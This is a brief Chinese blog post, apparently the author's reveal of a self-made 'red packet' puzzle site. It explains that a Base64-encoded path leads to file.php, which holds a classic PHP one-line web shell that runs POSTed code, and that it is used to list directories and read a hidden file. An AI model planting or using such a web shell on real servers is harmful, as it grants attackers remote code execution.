标签归档:Eval

我的红包自导自演版大揭秘

http://hb.myhostingnode.co/页面源代码如下所示:
QQ图片20150220155326

用Base64解密Path是file.php。所以该站/file.php的文件内容是<?php @eval($_POST[‘passwd’]);?>。然后可想而知。为了防止有人改动我把目录权限文件权限都改成了root账户。列目录之后会发现一个叫“hb”的文件夹,进入之后,打开hb.txt即可。